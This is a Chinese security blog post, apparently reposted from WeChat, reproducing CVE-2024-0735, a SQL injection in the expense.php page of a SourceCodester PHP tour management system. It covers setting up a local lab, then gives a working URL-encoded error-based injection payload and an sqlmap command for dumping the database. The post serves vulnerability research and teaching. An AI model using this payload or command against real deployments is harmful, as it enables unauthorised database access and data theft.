CVE-2024-0735

admin 2024年1月29日21:17:55评论40 views字数 1378阅读4分35秒阅读模式

使

应粉丝要求小编将往期poc和我在网上收集的一些poc打包分享到网盘了。同时分享了大量电子书和护网常用工具,在文末免费获取。

01

漏洞名称

SourceCodester在线旅游管理系统expense.php exec sql注入漏洞

02

漏洞影响

SourceCodester在线旅游管理系统,源码下载地址如下

https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

CVE-2024-0735

03

漏洞描述

SourceCodester是使用PHP和MySQL的在线旅游和旅行管理系统项目。具有完整的源代码,可用于学术项目目的。在该系统/admin/operations/expense.php接口处存在SQL注入漏洞。

想挖洞的同学可以看下其他几个项目

https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

CVE-2024-0735

04

靶场搭建

靶场使用小皮面板工具搭建,没有的自行安装

https://www.xp.cn/

靶场源码下载

https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL

下载后解压

CVE-2024-0735

对源码再次解压

CVE-2024-0735

将tour文件夹复制到小皮网站的物理路径下

CVE-2024-0735

CVE-2024-0735

找到config.php文件,修改MySQL的用户名密码

CVE-2024-0735

在MySQL中创建数据库

create database tour1;

在解压目录下找到tour1.sql,并在数据库中执行语句,完成数据库初始化

然后重启nginx

CVE-2024-0735

访问网站http://localhost/tour/

CVE-2024-0735

靶场搭建成功

用户名密码:

Username : [email protected]

Password : admin

CVE-2024-0735

05

漏洞复现

漏洞url

/admin/operations/expense.php

这是个get请求,可以直接在浏览器访问

http://localhost/tour/admin/operations/expense.php?id=1%27%20AND%20EXTRACTVALUE(1586,CONCAT(0x5c,0x7176626271,(SELECT%20(ELT(1586=1586,1))),0x7162717871))%20AND%20%27Vqhf%27=%27Vqhf

CVE-2024-0735

使用sqlmap查看数据库

sqlmap.py -u http://localhost/tour/admin/operations/expense.php?id=1 --current-db

CVE-2024-0735

06

修复建议

自行修改源码修复。

CVE-2024-0735

07

原文始发于微信公众号(AI与网安):CVE-2024-0735

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月29日21:17:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-0735http://cn-sec.com/archives/2439932.html

发表评论

匿名网友 填写信息